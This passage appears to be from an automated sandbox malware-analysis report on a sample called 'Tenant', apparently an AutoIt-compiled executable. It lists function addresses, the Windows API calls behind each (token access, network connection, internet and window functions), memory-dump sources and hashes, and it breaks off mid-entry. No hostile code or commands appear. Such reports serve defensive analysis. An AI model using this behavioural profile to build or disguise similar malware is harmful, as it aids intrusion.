                                                                                        • Instruction Fuzzy Hash: FCE0397154522CBBDB216FA29D0DEEB3F1CEF267E1F108011F60D96050CB718554CBA0
                                                                                        Function 00AA25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00AA260D
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00AA2617
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00AA262C
                                                                                        • GetStockObject.GDI32(00000005), ref: 00AA2634
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00ADC1C4
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00ADC1D1
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00ADC1EA
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00ADC203
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00ADC223
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ADC22E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 27f20c6249e5575116f1becfcde2d40c258da34729dbba300af71d9f89165994
                                                                                        • Instruction ID: 2e130784eed07039ea0dceae84bad58117c69ee2128907a3dd93cd0e1d5b870c
                                                                                        • Opcode Fuzzy Hash: 27f20c6249e5575116f1becfcde2d40c258da34729dbba300af71d9f89165994
                                                                                        • Instruction Fuzzy Hash: 75E0ED31104244BBDB222FA8AC08BDC3B10EF11332F208366FA69580E18B714A80DB11
                                                                                        Function 00AF9330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 00AF9339
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AF8F04), ref: 00AF9340
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AF8F04), ref: 00AF934D
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AF8F04), ref: 00AF9354
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: 0453d410fa492a2215211f3d792ecd9d94c243aaf28551ce961b7f8b35046bec
                                                                                        • Instruction ID: de4cd4c86dd62dce66261a6b2cd494fe2225ee7007ce211cac5a63cf6695e824
                                                                                        • Opcode Fuzzy Hash: 0453d410fa492a2215211f3d792ecd9d94c243aaf28551ce961b7f8b35046bec
                                                                                        • Instruction Fuzzy Hash: ADE086326112159FD7202FF15D0DF5B3B6CEF54791F204858B345CB090EB349444CB54
                                                                                        Function 00AE0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 00AE0679
                                                                                        • GetDC.USER32(00000000), ref: 00AE0683
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AE06A3
                                                                                        • ReleaseDC.USER32(?), ref: 00AE06C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 80b0cfb59e7a0b3b2848bc028bec38e5d551648ec8a36f1098f9ca89863f44ec
                                                                                        • Instruction ID: ba9e623ceacaced89182fd426f8a6ac64fe92976f9aabfa467035a05b55107a6
                                                                                        • Opcode Fuzzy Hash: 80b0cfb59e7a0b3b2848bc028bec38e5d551648ec8a36f1098f9ca89863f44ec
                                                                                        • Instruction Fuzzy Hash: 41E01AB1810204EFCB02AF70D819B5D7BF5EF8C310F218005F85AE7650CB7885519F50
                                                                                        Function 00AE068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 00AE068D
                                                                                        • GetDC.USER32(00000000), ref: 00AE0697
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AE06A3
                                                                                        • ReleaseDC.USER32(?), ref: 00AE06C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 2c5ac4538fc8b4b57197fca847c0147dfb801aadb0907b92d63f495cec3e9dad
                                                                                        • Instruction ID: 82f67b8af96472037e61e20701361dad2eda77136275f7e31d289854669eaed4
                                                                                        • Opcode Fuzzy Hash: 2c5ac4538fc8b4b57197fca847c0147dfb801aadb0907b92d63f495cec3e9dad
                                                                                        • Instruction Fuzzy Hash: 7AE012B1810204AFCB02AFB0D819A9EBBF5AF8C310F208008F95AE7250CB7895518F50
                                                                                        Function 00B0B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB436A: _wcscpy.LIBCMT ref: 00AB438D
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • __wcsnicmp.LIBCMT ref: 00B0B670
                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B0B739
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                        • String ID: LPT
                                                                                        • API String ID: 3222508074-1350329615
                                                                                        • Opcode ID: 54d2fb995428357f4d0f48dcdb774a3e2953471661d041c0958d5d67b3399587
                                                                                        • Instruction ID: f8ef4707e6026f9ce7a557f497431456bfdee556ddd43c1bac8165cc971a29af
                                                                                        • Opcode Fuzzy Hash: 54d2fb995428357f4d0f48dcdb774a3e2953471661d041c0958d5d67b3399587
                                                                                        • Instruction Fuzzy Hash: EF619175A00219AFCB14EF94C991EAEBBF4EF49710F158099F506AB3D1DB70AE40CB94
                                                                                        Function 00AAE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00AAE01E
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00AAE037
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: c18cf3c7799c5543a2afe3fd2e5617aafcae2d9a385413f9f8f42a467199d7ba
                                                                                        • Instruction ID: 8b57b104b855f764aec4ea03bdfe2498c4f17a9eae005d241fe025a996d2680d
                                                                                        • Opcode Fuzzy Hash: c18cf3c7799c5543a2afe3fd2e5617aafcae2d9a385413f9f8f42a467199d7ba
                                                                                        • Instruction Fuzzy Hash: 9E515971408B449BE320AF50E885BAFBBE8FFC9314F51484DF1D8421A1DBB095298B26
                                                                                        Function 00B28096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B28186
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B2819B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: 30f09c3f2d9c86a2bbc093c06e75cfbdf98512025655a243ebebe14feae38e1e
                                                                                        • Instruction ID: bc478eba72e295a4277bbca8e57ddb9090b74762cce64083714891aa2cf80cae
                                                                                        • Opcode Fuzzy Hash: 30f09c3f2d9c86a2bbc093c06e75cfbdf98512025655a243ebebe14feae38e1e
                                                                                        • Instruction Fuzzy Hash: 81411974A012199FDB14CF68D881BDA7BF5FF09301F1041AAE908EB391DB71A956CF90
                                                                                        Function 00B12C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B12C6A
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B12CA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |
                                                                                        • API String ID: 1413715105-2343686810
                                                                                        • Opcode ID: d4739eb4a41ee24078627f7eb92ab537bf9ff0bdafd506b0ffcd790940be547d
                                                                                        • Instruction ID: ff04b0d9bfbc918283413647237058a768f7c6f4d46f8d70153334bef9c1f3a4
                                                                                        • Opcode Fuzzy Hash: d4739eb4a41ee24078627f7eb92ab537bf9ff0bdafd506b0ffcd790940be547d
                                                                                        • Instruction Fuzzy Hash: AA314D71C00219ABCF41EFA0DD85EEEBFB9FF05300F500069F915AA162EB315956DBA0
                                                                                        Function 00B27088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00B2713C
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B27178
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: 92deff656eb9ddb46791a4da7f4d87eb6e0021b9cccc6d0a466481031aada66f
                                                                                        • Instruction ID: 6f1f0b233dad95eee70178c2b35af40bacd40eed9d4877751a2e6caf1db2c3c6
                                                                                        • Opcode Fuzzy Hash: 92deff656eb9ddb46791a4da7f4d87eb6e0021b9cccc6d0a466481031aada66f
                                                                                        • Instruction Fuzzy Hash: 67319A71110614AAEB109F78DC81AFB77E9FF88720F109659F9A997190DB30AC91CB64
                                                                                        Function 00B03049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B030B8
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B030F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 4a50498896adfd3ca8b1294258c0e1203ee7d514ce1459d1b7f951aca7ff4a10
                                                                                        • Instruction ID: 6905c51f4f628fe25bc70bea9482d103e3d344282a784d747df0ad1f2a871aa6
                                                                                        • Opcode Fuzzy Hash: 4a50498896adfd3ca8b1294258c0e1203ee7d514ce1459d1b7f951aca7ff4a10
                                                                                        • Instruction Fuzzy Hash: 5831F531604205ABEB248F58C989FAEBFFDEF09B40F144099E981B61E1E7709B44CB50
                                                                                        Function 00B140B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __snwprintf.LIBCMT ref: 00B14132
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __snwprintf_memmove
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                        • API String ID: 3506404897-2584243854
                                                                                        • Opcode ID: 8bf1943bfebb6b3f4c7e4b9e4073501af3e57386c650fb79438a8e03da1b518d
                                                                                        • Instruction ID: 7ac3d34d5f32579a0843b7945e04c08e2228ec524aea34dbe50e3d3b3711a96c
                                                                                        • Opcode Fuzzy Hash: 8bf1943bfebb6b3f4c7e4b9e4073501af3e57386c650fb79438a8e03da1b518d
                                                                                        • Instruction Fuzzy Hash: 7E218471A0021C6BCF10EFA4C9A1EEE7BF9EF54741F900494F905B7182DB70A995CBA1
                                                                                        Function 00B26CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B26D86
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B26D91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        • Opcode ID: e88591eac0e5fa671936472ced8870974dcaaefbc639c5b2e21b0178b3645faa
                                                                                        • Instruction ID: 483e905c945f272ac7a3ee31a627e3b74404e942534491c75c1b7474288553df
                                                                                        • Opcode Fuzzy Hash: e88591eac0e5fa671936472ced8870974dcaaefbc639c5b2e21b0178b3645faa
                                                                                        • Instruction Fuzzy Hash: 0E11B67131021C7FEF119E54EC81FFB3BAAEB883A4F104179F9189B290DA719C508B60
                                                                                        Function 00B2722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA214F
                                                                                          • Part of subcall function 00AA2111: GetStockObject.GDI32(00000011), ref: 00AA2163
                                                                                          • Part of subcall function 00AA2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA216D
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B27296
                                                                                        • GetSysColor.USER32(00000012), ref: 00B272B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: e49a998742d113b191e90f9e49d89cd8a066ccf614b4a03fc72281c5a771e793
                                                                                        • Instruction ID: ad67c487ada4358b7a6e58ad9be5c0f499aad55f8495807743a5f5bc8c1e4653
                                                                                        • Opcode Fuzzy Hash: e49a998742d113b191e90f9e49d89cd8a066ccf614b4a03fc72281c5a771e793
                                                                                        • Instruction Fuzzy Hash: BC21477265421AAFDB04DFA8DC46EFA7BE8EF09304F114658FD59D3250DB34E8509B60
                                                                                        Function 00B26F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00B26FC7
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B26FD6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: edit
                                                                                        • API String ID: 2978978980-2167791130
                                                                                        • Opcode ID: b087d00052cdfdca463b67f76f53e77143a18ebf71896da3dcc7c89b60f435b7
                                                                                        • Instruction ID: ac33f680d55663cd668d86ba4a1a7080c8fe17597de8895f3b9cb2c740def550
                                                                                        • Opcode Fuzzy Hash: b087d00052cdfdca463b67f76f53e77143a18ebf71896da3dcc7c89b60f435b7
                                                                                        • Instruction Fuzzy Hash: ED116A71110218ABEF109E64BE90EAB3BAAEF15368F204764F978931E0CB75DC519B60
                                                                                        Function 00B03156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B031C9
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B031E8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 1ccdd82e39427081be8412651a44b6ca88772c70b2a20d9589b942ef80726dc7
                                                                                        • Instruction ID: 01d9f6180b17a31f918c2d1e13d4c1e7f2783ff22fd8fb07262961d2c2c5058d
                                                                                        • Opcode Fuzzy Hash: 1ccdd82e39427081be8412651a44b6ca88772c70b2a20d9589b942ef80726dc7
                                                                                        • Instruction Fuzzy Hash: ED11D032900114AFDB20DA98DC49B9DBBFCEF09B14F1441A1E909B72E0DB75AF05CB91
                                                                                        Function 00B128A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B128F8
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B12921
                                                                                        Strings
                                                                                        Memory Dump Source
